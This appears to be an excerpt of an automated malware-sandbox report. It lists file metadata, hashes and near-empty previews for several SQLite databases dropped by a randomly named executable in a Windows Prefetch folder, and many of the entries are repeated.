                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
